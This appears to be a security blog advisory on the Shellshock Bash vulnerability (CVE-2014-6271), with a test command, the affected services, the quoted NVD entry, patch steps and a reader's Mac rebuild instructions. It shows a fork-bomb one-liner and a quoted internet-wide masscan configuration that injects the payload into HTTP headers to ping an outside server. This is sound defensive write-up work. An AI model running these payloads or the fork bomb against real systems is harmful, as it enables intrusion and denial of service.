Bourne Again Shell (Bash) Remote Code Execution Vulnerability

Introduction

  • A remotely exploitable vulnerability was discovered by Stephane Chazelas of Akamai in the GNU Bash command shell.
  • The vulnerability has been assigned the CVE identifier CVE-2014-6271.
  • Exploitation of this vulnerability may allow a remote attacker to execute arbitrary code on an affected system.
  • The issue affects all UNIX and UNIX-like systems such as Linux and Mac OS X.

What is Bash?

Bash or the Bourne Again Shell, is a UNIX shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, Bash has evolved from a simple terminal based command interpreter to many other fancy uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name that has a value assigned to it. The same is true of the Bash shell.  It is common for a lot of programs to run Bash shell in the background. It is often used to provide a shell to a remote user (via SSH, Telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc). On linux systems, all system scripts during boot and from the CRON scheduler are typically executed using bash.

Bash is not the default shell for most commercial UNIX systems, but if Bash is installed as an add-on, it is easy to pass environment variables from other shells to Bash.

For more see: http://en.wikipedia.org/wiki/Bash_(Unix_shell)

Technical Description

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. For example, a well-known denial of service attack against a Linux system defines a function that calls itself:

Linux-terminal-prompt$ : () { : | : & }; :

In the above, the “:” is a bash function name! The stuff inside the curly brackets is the function calling itself and passing the result to itself and then back-grounding itself.  The final “:” invokes the function on the currently running bash shell.

The particular bug we are talking about begins where the semi-colon in the above invocation finishes.This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable).
Here is the attack vector:

Linux-terminal-prompt$ x=’() { :;}; echo Vulnerable’ bash –c ‘echo Test’
Vulnerable
Test

If the above code output “Vulnerable” as the first line then, your installed bash version is vulnerable to this issue.

Due to the fact that arbitrary code can be put in the execution environment of the Bash shell, this vulnerability is exposed in many contexts, for example:

  1. ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
  2. Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).
  3. PHP scripts executed with mod_php are not affected even if they spawn subshells.
  4. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
  5. Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

The patch used to fix this flaw, ensures that no code is allowed after the end of a Bash function. So if you run the above example with the patched version of Bash, you should get an output similar to:

Linux-terminal-prompt$ x=’() { :;}; echo Vulnerable’ bash –c ‘echo Test’
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
Test

HTTP–based Remote Attack Potential

Errata Security LLC ran an Internet-wide scan, as reported by well-known blogger Troy Hunt.  Imagine an HTTP request with configuration parameters of the “masscan” tool that look like this:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in this:

bash bug - Checkmate

Shown above are ping responses from vulnerable apache servers sent back to Robert Graham’s server. The vulnerability lies in CGI scripts that utilize bash to process HTTP data. Effectively this is ‘arbitrary code injection’ into the remote bash shell without authentication. BurpSuit a favourite tool of pentesters has also gained a scanning module that checks for this issue.

Mitigations

On RedHat/Fedora/CentOS run

Linux-prompt# yum update bash

On Debian/Ubuntu based systems

Linux-prompt# apt-get update && apt-get upgrade bash

For solaris, Mac OS X and other Unices current options are to compile and install a patched version of bash from GNU.

Workarounds

Redhat has released a number of workarounds for different Linux sub-systems which could be reviewed here.

SANs Webcast on the Vulnerability

https://isc.sans.edu/forums/diary//18709

Common Vulnerability Exposure Details

Vulnerability Summary for CVE-2014-6271
Original release date: 09/24/2014
Last revised: 09/26/2014
Source: US-CERT/NIST

Overview
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Impact

  • CVSS Severity (version 2.0):
    • CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend)
    • Impact Subscore: 10.0
    • Exploitability Subscore: 10.0
  • CVSS Version 2 Metrics:
    • Access Vector: Network exploitable
    • Access Complexity: Low
    • Authentication: Not required to exploit
    • Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

References to Advisories, Solutions, and Tools
By selecting these links, you will be leaving NIST webspace. We have provided these links to other web sites because they may have information that would be of interest to you. No inferences should be drawn on account of other sites being referenced, or not, from this page. There may be other web sites that are more appropriate for your purpose. NIST does not necessarily endorse the views expressed, or concur with the facts presented on these sites. Further, NIST does not endorse any commercial products that may be mentioned on these sites. Please address comments about this page to nvd@nist.gov.

External Source: CONFIRM

Name: https://bugzilla.redhat.com/show_bug.cgi?id=1141597

Type: Patch Information

Hyperlink: https://bugzilla.redhat.com/show_bug.cgi?id=1141597

External Source: CONFIRM

Name: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Hyperlink: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Vulnerable software and versions
* cpe:/a:gnu:bash:1.14.0
* cpe:/a:gnu:bash:1.14.1
* cpe:/a:gnu:bash:1.14.2
* cpe:/a:gnu:bash:1.14.3
* cpe:/a:gnu:bash:1.14.4
* cpe:/a:gnu:bash:1.14.5
* cpe:/a:gnu:bash:1.14.6
* cpe:/a:gnu:bash:1.14.7
* cpe:/a:gnu:bash:2.0
* cpe:/a:gnu:bash:2.01
* cpe:/a:gnu:bash:2.01.1
* cpe:/a:gnu:bash:2.02
* cpe:/a:gnu:bash:2.02.1
* cpe:/a:gnu:bash:2.03
* cpe:/a:gnu:bash:2.04
* cpe:/a:gnu:bash:2.05
* cpe:/a:gnu:bash:2.05:a
* cpe:/a:gnu:bash:2.05:b
* cpe:/a:gnu:bash:3.0
* cpe:/a:gnu:bash:3.0.16
* cpe:/a:gnu:bash:3.1
* cpe:/a:gnu:bash:3.2
* cpe:/a:gnu:bash:3.2.48
* cpe:/a:gnu:bash:4.0
* cpe:/a:gnu:bash:4.0:rc1
* cpe:/a:gnu:bash:4.1
* cpe:/a:gnu:bash:4.2
* cpe:/a:gnu:bash:4.3

* Denotes Vulnerable Software
Changes related to vulnerability configurations

Technical Details
Vulnerability Type (View All)

OS Command Injections (CWE-78)
CVE Standard Vulnerability Entry http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

References

  1. http://www.openwall.com/lists/oss-security/2014/09/24/11
  2. https://access.redhat.com/articles/1200223
  3. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
  4. https://securityblog.redhat.com/
  5. https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
  6. https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
  7. http://garage4hackers.com/entry.php?b=3087
  8. http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
  9. https://web.nvd.nist.gov/view/vuln/search-results?query=cve-2014-6271&search_type=all&cves=on

Author


2 comments

How to fix the Shell Shock vulnerability for Mac OS X

$ mkdir bash-fix
$ cd bash-fix
$ curl https://opensource.apple.com/tarballs/bash/bash-92.tar.gz | tar zxf –
$ cd bash-92/bash-3.2
$ curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 | patch -p0
$ curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-053 | patch -p0
$ cd ..
$ sudo xcodebuild
$ sudo cp /bin/bash /bin/bash.old
$ sudo cp /bin/sh /bin/sh.old
$ build/Release/bash –version # GNU bash, version 3.2.53(1)-release
$ build/Release/sh –version # GNU bash, version 3.2.53(1)-release
$ sudo cp build/Release/bash /bin
$ sudo cp build/Release/sh /bin

Excellent, thanks for the information!

Apple has also now release a patch for the same: https://support.apple.com/kb/dl1769

Leave a Reply

Your email address will not be published. Required fields are marked *